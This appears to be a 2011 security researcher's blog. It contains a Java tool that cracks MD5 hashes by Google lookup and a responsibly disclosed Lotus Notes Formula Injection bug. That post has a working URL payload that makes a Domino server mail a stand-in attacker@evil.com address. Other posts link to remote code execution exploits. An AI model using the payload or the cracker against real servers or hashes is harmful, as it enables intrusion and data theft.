Saturday, December 24, 2011

Cracking MD5 with Google

It has been known for a long time now that Google can be used for all kinds of awesome things (Google query hacking etc), and hash cracking is one of them.

I thought I would share something I wrote last year to demonstrate how easy it is to crack MD5, just by using Google. This is easily adapted for use with other hashes, cracking SHA1 works well too. I've found the success rate to be extremely high. Enjoy :)

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
package md5crack;

import java.io.*;
import java.net.*;
import java.util.logging.*;
import org.apache.commons.codec.digest.DigestUtils;

/**
 *
 * @author Adam Boulton - Using Google to crack MD5
 */
public class MD5Crack {

    /**
     * @param args the command line arguments
     */
    public static void main(String[] args) {
        // TODO code application logic here

        if(args[0] == null || args[0].isEmpty())
        {
            System.out.println("-= Google MD5 Cracker =-");
            System.out.println("-= Adam Boulton - 2010 =- ");
            System.out.println("Usage: MD5crack <hash>");
        }
 
        String hash = args[0];
        String url = String.format("https://www.google.com/search?q=%s", hash);

        try {
            URL oracle = new URL(url);
            URLConnection conn = oracle.openConnection();

            //keep Google happy, otherwise connection refused.
            conn.setRequestProperty("user-agent", "Mozilla/5.0 Windows NT6.1 WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.63 Safari/535.7");

            BufferedReader in = new BufferedReader(
                    new InputStreamReader(
                    conn.getInputStream()));
            
            String inputLine;

            while ((inputLine = in.readLine()) != null) {
                String[] words = inputLine.split("\\s+");

                for (String word : words) {
                    String wordHash = DigestUtils.md5Hex(word);
                    if (wordHash.equals(hash)) {

                        System.out.println("[*] Found: " + word);
                        System.exit(0);
                    }
                }
            }
            
            System.out.println("[!] No results.");
            in.close();

        } catch (IOException ex) {
            Logger.getLogger(MD5Crack.class.getName()).log(Level.SEVERE, null, ex);
        }
    }
}

Saturday, November 19, 2011

New security vulnerability: Lotus Notes Formula Injection

From time to time, I get an opportunity to do some independent research. Something that has always particularly peaked my interest is Lotus Notes environments, both the administration and development platform. I feel what makes it an interesting environment is:

1. The focus is business applications
2. There has never been a significant focus from the IT security industry (Fortify doesn't even scan Lotus code)
3. My father happens to be a Lotus Notes Certified Developer.

These three points make an interesting recipe for security assessments.

Back in April 2010 I was having a usual tech talk with my dad about IT in general and software development practices. This is when I was introduced to the Domino Blog. Domino Blog is a Lotus Notes application offered by IBM as a weblog solution. It is generally intended for social media networking, allowing users to post topics and allow the general public to supply comments. This application is deployed within a Lotus Domino
environment and is utilized by a wide audience, from IBM employees to the general public.

My dad happened to have this setup on one of his servers, so it was all ready to break. To speed things up, we moved straight onto a secure code review of the application. The scope of tainted data was fairly limited, so it didn't take long to identify all the entry points, which makes the assessment much easier.
There are interesting functions in LotusScript, but one in particular is the 'Evaluate' function, which allows a Developer to build dynamic functionality by executing Lotus Notes Formula statements. For those who are familiar with other injection vulnerabilities (SQLi), I am sure the problem is becoming apparent.

It just so happens that in the Domino Blog there are Evaluate functions which are a sink for data received from HTTP requests without performing data encoding. To move straight onto an example payload it would look like this:


http://lotusnotesblogdomain.co.uk/blog.nsf/archive?openview&title=Motorbikes&type=cat&cat=");
@MailSend("attacker@evil.com";"";"";"Formula%20Injection";
"The%20email%body%belongs%here");
@IsText("


The payload above would force the Domino server to issue mail. As the Evaluate function supports wrapping of formula functions, it is trivial to start pulling data from the server and get it delivered to an email account.

An attacker simply requires the knowledge of how to correctly construct the statement to meet the requirements of the Evaluate function, and gain familiarity with the Formula language. As can be on the formula poster there is extremely powerful functionality that can make the payloads extremely interesting, and can certainly result in total compromise of the Lotus Notes server. I've appropriately coined this vulnerability Lotus Notes Formula Injection :)

Certainly add this to your list for web app or source code reviews of a Domino application.

Note: This was all responsibly disclosed to IBM in April 2010.

Update: 24/12/2011 - I thought it was pretty cool to see this picked up by WhiteHat Security and put in Jeremiah Grossman's blogspot 

Wednesday, July 20, 2011

JavaPayload project

This is not one to be missed! It is very impressive, Michael (Mihi) has clearly worked hard on this, kudos to him!

http://javapayload.sourceforge.net/

Monday, July 18, 2011

Insecure coding examples

A really useful list of test cases are available on the DHS National Cyber Security Division:

http://samate.nist.gov/SRD/view.php

Saturday, July 16, 2011

Java RMI Server Insecure Default Configuration Java Code Execution

Now this is interesting, a Java RMI remote code execution due to a default method being exposed by the distributed garbage collector. It is going to be a fun one to test!

http://www.exploit-db.com/exploits/17535/

The Metasploit page can be found here:

http://www.metasploit.com/modules/exploit/multi/misc/java_rmi_server

Update: Confirmed as working. It does rely on the RMI service being tunneled over HTTP. This particular exploit won't work directly with the typical JRMP services, but I am sure a similar vulnerability will exist. Warrants further digging....

Thursday, June 23, 2011

Java analysis and reverse engineering

Some really neat tools here:

http://www.woodmann.com/collaborative/tools/index.php/Category:Java_Tools

Java bytecode analysis

As with any language, there are always best practices. One that I wanted to take a deeper look into is from Joshua Bloch's book, Effective Java. The one in particular is item 4 - Avoid creating duplicate objects.

I wanted to take a deeper look as to what is actually happening at the byte code level. Joshua's recommendation is to never create a String as follows:

String str = new String("my string"); //never do this


and instead do:

String s = "my string";


The first statement results in an additional String instance being created.

So, taking a look at the Java bytecode using a single String instance we see:

LDC "my string" //push string "my string" onto stack
ASTORE 2 //store it in local variable 2


So it only requires two opcodes for a single String declaration and assignment. Let's compare this to the other "bad" example of creating a String instance unncessarily:

NEW java/lang/String //Make a new String object and leave a reference to it on the stack:

[ Stack now contains: objectref ]

DUP //Duplicate the object reference:

[ Stack now contains: objectref objectref ]

LDC "my string" //push string "my string" onto stack
INVOKESPECIAL java/lang/String.<init>(Ljava/lang/String;)V
//call the String instance initialization method

ASTORE 3 //and store it in local variable 3



As we can see, there is quite the difference as there are now five opcodes to achieve the same result. What I am going to be really interested in is taking a look at the translated interpreted code / native code.

Thursday, March 3, 2011

Java LiveConnect

LiveConnect is a feature of web browsers which allows Java applets to communicate with the JavaScript engine in the browser, and JavaScript on the web page to interact with applets. The LiveConnect concept originated in the Netscape web browser, and to this date, Mozilla and Firefox browsers have had the most complete support for LiveConnect features. It has, however, been possible to call between JavaScript and Java in some fashion on all web browsers for a number of years.

http://jdk6.java.net/plugin2/liveconnect/

Tuesday, February 22, 2011

Watcher v1.5.1 has been released

Watcher is a runtime passive-analysis tool for HTTP-based Web applications. Watcher detects Web-application security issues as well as operational configuration issues. Watcher provides detection for vulnerabilities, developers quick sanity checks, and auditors PCI compliance auditing. It looks for issues related to mashups, user-controlled payloads (potential XSS), cookies, comments, HTTP headers, SSL, Flash, Silverlight, referrer leaks, information disclosure, Unicode, and more.

Major Features:

  • Passive detection of security, privacy, and PCI compliance issues in HTTP, HTML, Javascript, CSS, and development frameworks (e.g. ASP.NET, JavaServer)
  • Works seamlessly with complex Web 2.0 applications while you drive the Web browser
  • Non-intrusive
  • Real-time analysis and reporting - findings are reported as they’re found, exportable to XML, HTML, and Team Foundation Server (TFS)
  • Configurable domains with wildcard support
  • Extensible framework for adding new checks


Watcher is built as a plugin for the Fiddler HTTP debugging proxy available at www.fiddlertool.com

Download Watcher from: http://websecuritytool.codeplex.com

Saturday, February 19, 2011

IBM Lotus Domino LDAP Bind Request Remote Code Execution Vulnerability

I am quite interested in Lotus Domino security, I think it makes an interesting platform for attacking for several reasons. It is a fully packed solution for enterprises (email, collaboration platform and custom application platform) and I don't believe the product has even really been scrutinized from a security pespective.

A remote code execution exploit is now available for the LDAP service, which is enabled by default :s The source of an exploit can be found here.

DOM XSS Scanner

DOMXSS Scanner

DOMXSS Scanner is an online tool that helps you find potential DOM based XSS security vulnerabilities. Enter a URL to scan the document and the included scripts for DOMXSS sources and sinks in the source code of Web pages and JavaScript files.

http://www.domxssscanner.com

Friday, February 18, 2011

Java SE 6 Update 24 released

JDK 6 Update 24 is now available to download from Oracle’s Java download page. Looking at the release notes, this is mainly a security and bug fix release. Thankfully, they have addressed the floating point parsing vulnerability which resulted in a denial of service of the JVM through excessive resource consumption.

Sunday, February 13, 2011

Patriot NG 2.0 released

Patriot NG is a 'Host IDS' tool which allows real time monitoring of changes in Windows systems or Network attacks. It is available for Windows XP, Windows Vista, Windows 7 (32Bits & 64bits)

Patriot monitors:

  • Changes in Registry keys: Indicating whether any sensitive key (autorun, internet explorer settings...) is altered.
  • New files in 'Startup' directories
  • New Users in the System
  • New Services installed
    Changes in the hosts file
  • New scheduled jobs
  • Alteration of the integrity of Internet Explorer: (New BHOs, configuration changes, new toolbars)
  • Changes in ARP table (Prevention of MITM attacks)
  • Installation of new Drivers
  • New Netbios shares
  • TCP/IP Defense (New open ports, new connections made by processes, PortScan detection...)
  • Files in critical directories (New executables, new DLLs...)
  • New hidden windows (cmd.exe / Internet Explorer using OLE objects)
  • Netbios connections to the System
  • ARP Watch (New hosts in your network)
  • NIDS (Detect anomalous network traffic based on editable rules)


Download: http://www.security-projects.com/?Patriot_NG:Download

Documentation: http://www.security-projects.com/ManualPatriot-NG2.0EN.pdf

Video demo: http://vimeo.com/19798452

BeEF v.0.4.2.2-alpha Released

BeEF, the Browser Exploitation Framework is a professional security tool provided for lawful research and testing purposes. It allows the experienced penetration tester or system administrator additional attack vectors when assessing the posture of a target. The user of BeEF will control which browser will launch which command module and at which target.

BeEF hooks one or more web browsers as beachheads for the launching of directed command modules in real-time. Each browser is likely to be within a different security context. This provides additional vectors that can be exploited by security professionals.
BeEF provides a professional and simple user interface. It is easy to deploy and is implemented in Ruby so it will run on most Operating Systems. The framework contains various command modules which employ BeEF's simple API. This API facilitates quick development of custom modules by the user.

Download: http://code.google.com